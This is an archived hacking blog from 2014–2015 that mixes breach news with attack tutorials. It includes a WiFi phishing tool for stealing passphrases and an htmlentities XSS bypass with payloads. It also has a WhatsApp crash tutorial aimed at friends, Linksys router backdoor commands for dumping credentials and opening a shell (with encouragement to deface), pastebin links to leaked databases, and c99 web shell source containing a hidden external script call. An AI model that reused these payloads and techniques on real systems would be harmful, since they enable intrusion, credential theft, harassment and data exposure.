‏إظهار الرسائل ذات التسميات Hackers. إظهار كافة الرسائل
‏إظهار الرسائل ذات التسميات Hackers. إظهار كافة الرسائل

الأحد، 1 مارس 2015

Use Jack For ClickJacking Development Assistance Tool

Use Jack For ClickJacking Development Assistance Tool.

Clickjacking POC development tool. Jack is a static HTML and JavaScript web-based tool. To get Jack up and running, serve the index.html file in a manner of your choice and ClickJack away. Be sure to check your browser settings when PoC'ing HTTPS based targets as most browsers will not allow embedding HTTPS resources into iFrames.

Download 

الأربعاء، 25 فبراير 2015

Lenovo Website Is Still Under Construction After Hacked By Lizard Squad


Lenovo Website Is Still Under Construction After Hacked By Lizard Squad.

After the Superfish Malware incident, Lenovo official website is suffering from cyber attack by hacking group called Lizard Squad. It was revealed earlier this week that Lenovo had been pre-installing controversial 'Superfish' adware to its laptops which compromised the computer's encryption certificates to quietly include more ads on Google search.

“We’re breaking free! Soarin’, flyin’, there’s not a star in heaven that we can’t reach!,” Lizard Squad posted on its Twitter page, quoting the song from the movie “High School Musical”.

The hacker group also posted a couple of screenshots of an email between Lenovo employees regarding the “Superfish” software.

On Lenovo website, Company apologies to there visitors with message,

"The Lenovo Web site is currently unavailable but will return soon. To place or check on the status of an order or for any other enquiries, please contact a Lenovo representative during regular business hours."


What is Superfish Adware?
Last friday dozen of Lenovo Laptops are compromised by SSL Spoofing attacks. Where cyber attackers can read HTTPS web traffic to perform the attacks.

You can also do check whether you laptop is compromised by Superfish or not by https://filippo.io/Badfish/. If you see a "YES" then you might have a problem. And if the message output is ,"GOOD, Superfish is probably not intercepting your connections", then you are safe.

About Lenovo:
Lenovo Group Ltd. is a Chinese multinational computer technology company with headquarters in Beijing, China, and Morrisville, North Carolina, United States. Company revenue $38.70 billion at 2014.

الاثنين، 9 فبراير 2015

The Hactivist Group Anonymous Take Over Dozens Of ISIS Social Media Accounts


The Hactivist Group Anonymous Take Over Dozens Of ISIS Social Media Accounts.

The online "hacktivist" group Anonymous has just hit a massive blow against ISIS and destroyed its months of recruiting efforts. Yes, the Islamic State of Iraq and Syria (ISIS) — the radical Islamic terrorist group known for its haematic, terrible propaganda videos. 

ISIS has a huge social media presence, with multiple Facebook, Twitter, YouTube and Instagram accounts. But, the Anonymous group recently took control of over dozens of Facebook and Twitter accounts used by ISIS recruiters to bring in new members.

Anonymous also released a video on Friday saying, "We are Muslims, Christians, Jews alike. We hackers, crackers, Hacktivist, phishers, agents, spies, or just the guy next door… students, administrators, workers, clerks, unemployed, rich, poor."

"We are young, or old, gay or straight… from all races, countries, religions, and ethnicity. United as one, divided by zero," and most important point made by the video is that the Anonymous believes that "the terrorists that are calling themselves [the] Islamic State (ISIS) are not Muslims."

The group further issued a warning to ISIS in its own statement, which is as follows:

"We will hunt you, take down your sites, accounts, emails, and expose you. From now on, no safe place for you online. You will be treated like a virus, and we are the cure. We own the internet. We are Anonymous; we are Legion; we do not forgive, we do not forget. Expect us."

The Anonymous group then said it made good on its pledge by launching cyber attacks and disabling several Twitter and Facebook accounts linked to ISIS which were used for recruiting purposes. Under the Twitter hashtag #OpISIS, Anonymous released a list of what it said were ISIS sites crippled by the cyber attack.

Some of ISIS Twitter accounts, that were taken offline by the online Hackivist group as part of #OpISIS are as follows:

Anonymous says the following Facebook accounts are in close contact with ISIS in Syria and Iraq. They advise us to “keep a close eye” on them.

الخميس، 5 فبراير 2015

Latest Global Black Market Intelligence And Security Threats


Latest Global Black Market Intelligence And Security Threats.
Havoscope: Information About The Global Black Market.

In today’s interconnected world, black markets have the power to wreak havoc on all industries and across all regions. Whether denying needed tax revenues to governments, destabilizing societies or damaging the environment, the global black market impacts nearly everyone on a daily basis.

Despite billions of dollars spent combating the activities of the black market, little attention has been given to producing clear and useful data about those activities. When information and market statistics have been produced, they generally have been used as marketing tools designed to promote a certain agenda rather than to objectively describe the actual situation.

Havocscope addresses this need for accurate, unbiased data by providing a centralized location for all information about the black market. By collecting and analyzing hundreds of pieces of data every day, we provide only the highest quality of information to our global users.

“We have checked the sources provided by Havocscope and have found
that Havocscope accurately records the reported amounts.”

-“Economic Analysis of the Proposed CACP Anti-Counterfeiting and Piracy Initiative”
LECG in a report prepared for the Coalition Against Counterfeiting and Piracy (CACP)

As the premier global provider of information on black market activities, the World Economic Forum used our data in its 2011 Global Risks Report to highlight the issue of illicit trade. In 2012, the Council on Foreign Relations utilized our research when researching the issue of transnational crime for their Global Governance Monitor Project.

All Havocscope data on the black market is available for free to the public for personal use. Ranking totals and other information collected by Havocscope may be cited, so long as Havocscope is properly sourced and credited with a link back to our website when applicable.

About The Author:
This article is written by Mayur Agnihotri. I'm Not a Master, I'm Still a Learner. NO-BODY is Safe in  Cyber World. Use Knowledge to Save Yourself & Your Country.Respect your Country's Cyber Law. " For Digital India We Should Think About Digital Terrorism First.....!! " - Hakon 

الجمعة، 23 يناير 2015

US Military Social-Media Accounts Hacked


CENTCOM
According to the reports, a hacker group who is claiming to be with the terrorist group ISIS and call themselves as the “Recently, Cyber Caliphate, took the complete control over the operation of Centcom YouTube channel and Twitter account that represents the United States central military command. There was a Pastebin tweeted by the hackers titles as “Pentagon account hacked with a message that, American soldiers, we are coming, now its time when you should watch your back. #CyberCaliphate”. This message included links to what is suppose to be with some confidential US Army files.

However, according to sources, it has come to light that these files might have been made available to public previously, in other words, these files cannot be deemed highly confidential. These files might not be confidential but at the end of the day, it was the files of Centcom’s social accounts that were compromised. This clearly indicates the pathetic state of the cyber security in the United States government. And if the hackers are able to get their hands on some of the most confidential files then it clearly indicates that ISIS is a more dreadful cyber-opponent than anyone can expect.

According to the tweets of Politico reporter Hadas Gold at 9:46AM PST, Twitter is aware of the cyber attack on Centcom and taking necessary steps to work on the issue. According to the update at 10:05AM PST, Twitter was able to remove the cover image and the profile image from Centcom. This was followed by the suspension of the Centcom account at 10:10AM PST. At 10:15AM PST, there was an update posted indicating one of the defense officials has confirmed these attacks to Fusion reported Brett LoGiurato. Brett LoGiurato tweeted that, defense official have confirmed that the United States Central Command Twitter account has been compromised. At 10:35AM PST another update followed indicating that even YouTube has suspended the hacked account of Centcom from YouTube. Around 11:55AM PST, The Next Web’s Matt Navarra tweeted that there has been a request received from Pentagon pertaining to an account security issue and they are working on the issue to resolve it.

Before the accounts could be shut, the following tweets were released from the account: 

1. Pentagon network hacked: Korean scenarios.
2. American soldiers, we are coming to you, now it’s time when you should watch your back.
3. We will not stop; we know everything about you, your wife, and your children.
4. ISIS is already here, we are in your computers, in each of your military base

While the US and its satellites kill our brothers and soldiers in Afghanistan, Syria and Iraq, then we broke into your networks and personal devices and know every information about you. The Cyber-Caliphate has also claimed to have taken control over the US media affiliates of CBS News and Fox in Tennessee. According to one of the Anonymous post left out in Pastebin, “In the name of Allah, the Most Gracious, the Most Merciful, the Cyber-Caliphate under the auspices of ISIS will continues with its Cyber-Jihad.

السبت، 10 يناير 2015

Facebook Bug - Open Redirection To Blocked Sites

Facebook

Facebook Bug - Open Redirection To Blocked Sites

Link Shim Of Facebook (l.php) 


A very good explanation for 'Link Shim' can be found here. It is a sweet note written by one of the security engineer at Facebook. In short, Facebook tries to protect their users by creating a list of harmless sites and harmful sites. So, sites which are malicious and are marked as `harmful` cannot be used on facebook.

eg. A user cannot post a link of a blocked site.

Try to post `http://ringcloud.com` on Facebook. You won't be allowed and a `warning` message will be displayed saying that `ringcloud.com` is blocked.



Send Dialog


Facebook introduced a 'Send Dialog' long time back. You can find details about it here. It was designed for sending private messages with `links` to one's friends, etc. It can be integrated on third party sites.

Have a look at this
https://www.facebook.com/dialog/send?app_id=145634995501895&link=http://www.pranavhivarekar.in/2014/10/hackerone-bug-redirect-filter-bypass.html&redirect_uri=https://www.google.com

The 'Send Dialog' accepts few parameters.
1. app_id (App needs to be created for using send dialog)
2. link (Link to be shared)
3. redirect_uri (Redirection to site mentioned here after sending message)


After pressing `Send` or `Cancel` user will be redirected to the site mentioned in `redirect_uri`.


Final Exploit 


The values passed to `link` parameter were getting passed through 'Link Shim'. So, attacker is limited to share only those links which are present in `harmless` list of link shim.
eg. Attacker can share any link like `http://pranavhivarekar.in`.

Now, note other `redirect_uri` parameter. I observed that it was not passed through link shim. So. attacker can redirect victims to any site after sending message.
eg. Attacker can redirect users to any site like `http://pranavhivarekar.in`.

So, what is the bug here?
I checked `redirect_uri` parameter against `harmful` list of 'Link Shim' and was really amused and glad to see the redirection to `harmful` site.
eg. I entered `http://ringcloud.com` and after `Sending`message or pressing `Cancel` it redirected me to `http://ringcloud.com`

So, it proves that there were no access controls placed to protect users from redirection to `harmful` sites and it did violate the working of 'Link Shim'. So, this bug was accepted and rewarded by facebook.

Now, if you try to use this exploit then it will show error like this.
eg. Try this --->

https://www.facebook.com/dialog/send?app_id=145634995501895&link=http://www.pranavhivarekar.in&redirect_uri=https://ringcloud.com

It will show you error like.

This bug was rewarded as it affected other users of Facebook and for pointing exactly about the policy of 'Link Shim'.

About The Author:
You can stay in contact with me(Pranav Hivarekar) on Facebook and can follow me on Twitter. Also, you can check my blog (http://pranavhivarekar.in) for new findings.
Thanks for spending time to read this ...! Comments are welcome. :-)

الخميس، 8 يناير 2015

Hack WiFi Account From Phishing Attack With WifiPhisher Tool



Hack WiFi Account From Phishing Attack With WifiPhisher Tool ..

Wifiphisher is a security tool that mounts fast automated phishing attacks against WiFi networks in order to obtain secret passphrases and other credentials. It is a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining credentials from captive portals and third party login pages or WPA/WPA2 secret passphrases.

From the victim's perspective, the attack makes use in three phases:

1. Victim is being deauthenticated from her access point. 
Wifiphisher continuously jams all of the target access point's wifi devices within range by sending deauth packets to the client from the access point, to the access point from the client, and to the broadcast address as well.

2. Victim joins a rogue access point. 
Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will start connecting to the rogue access point. After this phase, the victim is MiTMed.

3. Victim is being served a realistic router config-looking page. 
Wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for credentials, for example one that asks WPA password confirmation due to a router firmware upgrade.

Requirements
1. Kali Linux.
2. Two wireless network interfaces, one capable of injection.

For Usage

Short formLong formExplanation
-mmaximumChoose the maximum number of clients to deauth. List of clients
will be emptied and repopulated after hitting the limit. Example: -m 5
-nnoupdateDo not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n
-ttimeintervalChoose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space'
try: -t .00001
-ppacketsChoose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2
-ddirectedonlySkip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs
-aaccesspointEnter the MAC address of a specific access point to target
-jIjamminginterfaceChoose the interface for jamming. By default script will find the
most powerful interface and starts monitor mode on it.
-aIapinterfaceChoose the interface for the fake AP. By default script will find
the second most powerful interface and starts monitor mode on it.
Wifiphisher works on Kali Linux and is licensed under the MIT license

Download now

الجمعة، 2 يناير 2015

Hacker Clones a Politician’s Fingerprint Using Normal, Long-Distance Public Photos


Fingerprint
Something of this magnitude can’t expected to have happened in past couple of years but now, according to a member of the Chaos Computer Club, which is a European hacker association (on the similar lines of Cult of the Dead Cow in the united states of America) it is possible.

They have successfully shown that it is quite possible to clone or reproduce anyone’s fingerprints. This clone can be used to break into anyone’s system, which is protected by the biometric fingerprint scanners. They just need the photo of someone’s fingers. According to the club, they do not need any close up photos; any photos with the celebrity waving the hands even from a far distance will do the trick.

Considering this case, the CCC was able to get their hands on the fingerprint of Germany’s defense minister Ursula von der Leyen through a photo, which was taken during a press conference. This could easily be considered as a security breach if the German government uses biometric access control systems.

The findings: 

The findings were presented by Jan “Starbug” Krissler, the hacker at the Chaos communication congress. He was able to recreate the thumbprint of the minister by using a photo of the minister, which was taken at the press conference, and some other photos, which have take the picture of her thumb from multiple angles. He used one of the commercially available software called Verifinger Software.

Jan created a real world dummy by using this thumbprint. He started by printing it on a mask and then exposing the same to create a negative print on a substrate. Then he filled the negative with wood clue and created a new positive fingerprint. In case of testing, this technique can pose serious threat to Apple’s TouchID sensor and just in case the minister has Apple iphone then the company can seriously get her into trouble. By this, the company is hoping that the German government is not relying on fingerprints to control their military systems.

What is the drawback? 

With the digital fingerprint readers becoming very common now and it is being on laptops to high-end expensive smartphones. The biggest problem with fingerprints is that they can give false positive, negative and even multiple readings of the same print and give out different results. Even though fingerprints are the best means of identification, still security and forensic communities are looking forwards towards more techniques that are reliable.

DNA sequencing is being considered a one of the best means of forensic identification, and vein matching and gait analysis are best options for control access. This technique is called living biometrics and as the name suggest it is only valid until the person is alive. This technique is already in use in Poland and Japan at some of their ATM’s.

If you are among the people who are using fingerprints for access control, it might be a good time to switch over to something more reliable.



 

الأربعاء، 31 ديسمبر 2014

How Can We Bypass HTMLEntities Tutorial


How Can We Bypass HTMLEntities Tutorial ?

The Security researcher Paulos Yibelo share with HOC that how he bypassing htmlentities().

Well I don’t know how to break it down for you, you just can’t (if the function is used properly and exactly where it should). But it’s more probable that most developers don’t use it the right way, since it’s like a norm for some developers to not use built-in functions properly :P. So I will talk about some of the cases I came up while pentesting. htmlentities() and htmlspecailchars() are functions mainly developed to filter out cross site scripting attacks.

But I can promise you that you can build a better function if your user input is massive since that’s when most exploitation scenarios begin. How? Well, the functions html entity the characters < , > “ and ‘. So without those there seems there is no XSS. Or isn’t really? Well, I can think of one. Something like javascript:alert(1); will be executed since none of the characters in it are filtered to be html entityed… but there is a limitation to this. Without using “> or any similar technique we will not be able to break out of the attribute we are inside.

Also the value attribute in html is not vulnerable since it only accepts strings and well we need scripts that can execute… something like href, onclick would do… but who would put such a foolish mistake right? Well you wouldn’t believe if I told you even big companies like Facebook does.
Have a code like?
print '<img src="'.htmlentities("$url").”';
or even
                print "<a href='".htmlentities($url)."'>Click Here</a>";

“javascript:alert(1);” will bypass it because it doesn’t contain the characters that will be filtered. But notice a limitation here? Our code will only execute if user clicks the Click Here button. So that’s a huge limitation. Or is it? The html code will become something like

<a href='javascript:alert(1);'>Click Here</a>

But we need to break out of the href tag and execute a more malicious javascript. But how? If we try to break out of it using ‘> it won’t work since both those characters are filtered out… and the code will become something like

<a href='javascript:alert(1);&quot;&gt;'>Click Here</a>

Right? Well not exactly. Htmlentities comes with single quote ( ‘ ) not filtered by default and you have to specify a special switch called ENT_QUOTES to declare that. So the real output when values like “javascript:alert(1);’>” is given

<a href='javascript:alert(1);'&gt;'>Click Here</a>

A hope! We broke out of the attribute so giving values like

javascript:alert(1);’ onfocus=alert(1); autofocus

will output html source like

<a href='javascript:alert(1);' onfocus=alert(1); autofocus>Click Here</a>

So wow… our final payload to bypass the filter would look something like

paulos’ onfocus=alert(0); autofocus

Would successfully bypass the function htmlentities and prints out the source of

<a href='paulos' onfocus=alert(0) autofocus>Click Here</a>

Successful explotation of the function htmlentities.  so why not use the switch to enable the single quote (‘) and make our code secured. something like

 print "<a href='".htmlentities($url, ENT_QUOTES)."'>Click Here</a>";

Well now, we may can’t break out of the cage we are inside but still can execute JavaScript in the attribute we are inside. However, the value html attribute is off limits. we cannot execute JavaScript inside it. But when you find code like:

print "<input type='text' value=".htmlentities("$value").">";

even when using ENT_QUOTES, this is when value attribute becomes vulnerable.

paulos onmouseover=alert(1);

 will successfully bypass the value parameter and make html code like

<input type='text' value=paulos onmouseover=alert(1);>
Cool.

So not using quotes got us vulnerable, we will just use quotes then. Well I recommend not using single quotes… that’s when your code nearly becomes vulnerable when you forgot to use  the switch ENT_QUOTES, which you probably will.

But this isn’t just it… attackers can still attack your application using a different character set called UTF-7 even when you are using proper usage of htmlentities, so unless you protect your code by setting your charset to UTF-8 or any other charset other that 7, you are still vulnerable to XSS.

About The Author:
Paulos Yibelo, 17 years, a computer geek. He is a web-application security researcher and developer. He gets Acknowledgements and Rewards from big companies like Facebook, Microsoft, SoundCloud, AT&T, AVG and more companies.

الأربعاء، 24 ديسمبر 2014

ANATEL - Brazilian National Telecommunications Agency Hacked


ANATEL - Brazilian National Telecommunications Agency was hacked this week and hackers leaked the database and various information online.

Everything indicates that it is a form of protest against the telephone companies and the country's internet, Marco Civil and Internet freedom.

The hacker who identifies himself as [?] 1NC0GN1T0 [?], Also left a message for telephone operators GVT, Oi, Claro, Vivo, Tim, NET, Embratel and others.


Watch full detail:

الاثنين، 15 ديسمبر 2014

MSN.COM Affected By Multiple Flash Cross-Site Scripting Vulnerabilities


MSN.COM Affected By Multiple Flash Cross-Site Scripting Vulnerabilities!

Basically a Flash Cross-Site Scripting Vulnerability isn't so different from the other XSS Attacks and infect they have the same High Impact like the others! but the unique difference is that it works via Flash Object Files (.SWF).

Christian Galeone a youngest cyber security researcher has been found vulnerability in Microsoft domain. He describe as follows:

Into my Bug Hunting Carrier i had the opportunity to find Several High Issues, one of them is the Flash Cross Site Scripting Vulnerability!.

So, here is how it works!:



For these reasons, i have Recently found that the domain " ads1.msn.com " from Microsoft Inc. had Several Vulnerable Flash Objects for this type of Attack!

**Affected URL(s) Link:**

http://ads1.msn.com/ads/7188/0000007188_000000000000000633582.swf

http://ads1.msn.com/ads/76434/0000076434_000000000000000600751.swf

http://ads1.msn.com/ads/83264/0000083264_000000000000000674697.swf

http://ads1.msn.com/ads/60380/0000060380_000000000000000471735.swf

http://ads1.msn.com/ads/73102/0000073102_000000000000000411337.swf

http://ads1.msn.com/ads/68526/0000068526_000000000000000626606.swf

http://ads1.msn.com/ads/76434/0000076434_000000000000000600754.swf

http://ads1.msn.com/ads/53428/0000053428_000000000000000567342.swf

http://ads1.msn.com/ads/9911/0000009911_000000000000000610871.swf

http://ads1.msn.com/ads/65522/0000065522_000000000000000526160.swf

I have downloaded the SWF Object(s) and analyzed their Internal Code with SWFScan (from HP), here you can see the code:


As i saw, the ?ClickTag= Parameter was Vulnerable (after have tested it manually) and so i was able to Inject the PoC Payload Script into it, as you can see below,

Javascript:prompt(document.domain)//

The document.domain indicate where the Script Execution will come from, so the PoC Link will look as below:

http://ads1.msn.com/ads/7188/0000007188_000000000000000633582.swf?clickTAG=Javascript:prompt(document.domain)//

Let's see the main SWF Screen


This is our Result - (Click into the Banner)!



Where about:blank it indicates the Origin of the Script, in our Case the 0000007188_000000000000000633582.swf Object!.

I've then reported the issue to Microsoft Security Team and they decided to Credit me into their Acknowledgement Page for the month of January 2015!




Let's say is an awesome Gift ;-)
Marry Christmas and Happy New Year to Everybody!!

More Details:
http://www.acunetix.com/blog/articles/elaborate-ways-exploit-xss-flash-parameter-injection/

About the Author :
Christian Galeone is a Cyber Security Researcher from Italy, he's currently studying to ITCL Marco Polo ( Vocational Technical Institute | Vo-Tech ) attending the IT Programming Class.
He has been Acknowledged by the TOP 5 Companies including Yahoo!, Microsoft, AT&T, Sony etc.
He is currently working with HOC as author of Cyber Security & Critical Tools Research Articles.

الأربعاء، 3 ديسمبر 2014

Crash Your Friend WhatsApp Account Remotely [TUTORIAL]


Crash Your Friend WhatsApp Account Remotely [TUTORIAL]

Recently published a report here on the blog a new flaw found in WhatsApp, where you can catch Application on the phone of another person by sending a message 2KB, made up of characters that the app can not decipher.

The process is simple:

1 - Through its cellular visit the link Pastebin containing the characters
http://pastebin.com/3efiBva4


2 - Select all characters, copy, select a conversation and paste. It could be a private conversation or in a group.


3 - Message sent, now only await the outcome.


Link with message 2 KB in Pastebin: http://pastebin.com/3efiBva4
When the reader will click on message, then WhatsApp will be crashed.

Note: The responsibility is yours to crash private groups or conversations.

Thanks to my friend Juliana for the help.

الثلاثاء، 18 نوفمبر 2014

Exploiting CISCO Linksys Router WAG200G


Exploiting CISCO Router... Linksys WAG200G!

If you think that your Router can't be locally exploited, i will give you a hit!.

The OLD Modems can be easily exploited such as mine (Linksys WAG200G).

I've found this Great Exploit (valid also for other CISCO/Linksys Routers) developed by Eloi Vanderbeken :D

Let's now see what can we do with it!:

PoC Tool Link:

https://github.com/elvanderb/TCP-32764/archive/master.zip

How it works?

First of all we need thus Requirement(s):

Python (for run the Script) & ZenMap (for do a quick Scan of our open ports!)

After we have them into our System, we can run ZenMap Port Scanning tool using the following Command:

nmap -p 1-32764 192.168.1.1

We can see that (after a while...) for thus who has this Router the Vulnerable Port :32764 will comes up as:

"Unknown Service"

Okay, now let's run the PoC.py Script using the following Command:

PoC.py Command:

--ip 192.168.1.1 --get_credentials





With this command you will be able to gather your Router Credentials without need to change the Password or having a direct access into it! (Good for *geek kids* that would have an access to teh internet when their parents blocks it!.)

But...you can do even more than discover your Router Credentials!

Into the PoC.py Command Script, there's an option for enter directly into the Shell of our Local Target!

You can use this string (into the PoC.py Script):

--ip 192.168.1.1 --shell

This is our Result!

After we are inside it, of course, we can also deface it.

What can i say... HAPPY HACKING! ;-)

POC Video:




More Details:

Security Article -->
https://github.com/elvanderb/TCP-32764


Technical Presentation -->
https://github.com/elvanderb/TCP-32764/blob/master/backdoor_description.pptx

Brought to you By Christian Galeone, full credits goes to Eloi Vanderbeken - Thanks Dude for your finding!.
--------------------------------------------------------------------------------------

About the Author :
Christian Galeone is a Cyber Security Researcher from Italy, he's currently studying to ITCL Marco Polo ( Vocational Technical Institute | Vo-Tech ) attending the IT Programming Class.
He has been Acknowledged by the TOP 5 Companies including Yahoo!, Microsoft, AT&T, Sony etc.
He is currently working with HOC as author of Cyber Security & Critical Tools Research Articles.

-----------------------------------------------------

الخميس، 25 سبتمبر 2014

Find Out All Detailed Info Of Twitter User Activity By TinfoLeak


Find Out All Detailed Info Of Twitter User Activity By TinfoLeak. Its working on python platform where its grab all the information of any Twitter users

Tinfoleak is a simple Python script that allow to obtain:

  • basic information about a Twitter user (name, picture, location, followers, etc.)
  • devices and operating systems used by the Twitter user
  • applications and social networks used by the Twitter user
  • place and geolocation coordinates to generate a tracking map of locations visited
  • show user tweets in Google Earth!
  • download all pics from a Twitter user
  • hashtags used by the Twitter user and when are used (date and time)
  • user mentions by the the Twitter user and when are occurred (date and time)
  • topics used by the Twitter user


You can filter all the information by:

  1. start date / time
  2. end date / time
  3. keywords

Download link

Source link

الاثنين، 22 سبتمبر 2014

Globosat Satellite TV Service in Brazil, Website Got Hacked And Exposed By 1NC0GN1T0



Globosat Website was hacked and exposed by 1NC0GN1T0. Globosat is a multichannel cable and satellite TV service in Brazil.

The Globosat website (http://globosatcomercial.globo.com/) was hacked and had their information database leaked on internet. 

Globosat is a Brazilian company belonging to Globo, the largest television programmer in Latin America. Among their main channels, are Telecine Network, focused on film productions; SporTV, sports; GNT, variety, focusing on women public and GloboNews, 24 hours journalism. Headquarters in the city of Rio de Janeiro, with facilities in the neighborhood of Barra da Tijuca. It began on 19 October 1991. Are 20.8 million viewers spread over more than 6.1 million households-subscribers. It is the programmer greater average daily reach: 7.5 million different viewers.

The Globosat website remains down for maintenance.

Link of the leaked information: 
http://pastebin.com/Ce4VMPs7 
or
https://ghostbin.com/paste/d2dwd

الثلاثاء، 9 سبتمبر 2014

Free Shells For Everyone C99.php sh3ll - r57.gen.tr Has Backdoor(s)


Free Shells For Everyone C99.php sh3ll - r57.gen.tr Has Backdoor(s). Do you know this sh3ll? If the answer is Yes, you might be infected!

A recent discovery from @Matthew Bryant - Yahoo! Security Team (thehackerblog.com), found that the most used sh3ll for "Hackers" contain several Backdoor(s) which allows the user to bypass his control and gain the access to itself without knowing the password.

He also found how the site r57.gen.tr TRACKS ON the users allowing the admin to steal all the websites where is located the sh3ll.

1) SH3LL STEALING CODE

Let's focusing on the code:
-----------------------------

[CODE]

mandatory@mandatorys-box:~/Pentest/c99$ grep --color -n "https://" c99.php 
79:if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
1706:   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}

mandatory@mandatorys-box:~/Pentest/c99$ grep --color -n "http://" c99.php 11:   http://ccteam.ru/releases/c99shell
13:*  WEB: http://ccteam.ru
79:if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
99:$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";
103:$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/"; //Update server
259:if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
599:# Home page: http://ccteam.ru
855:?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php1706:   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
2912:if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";}
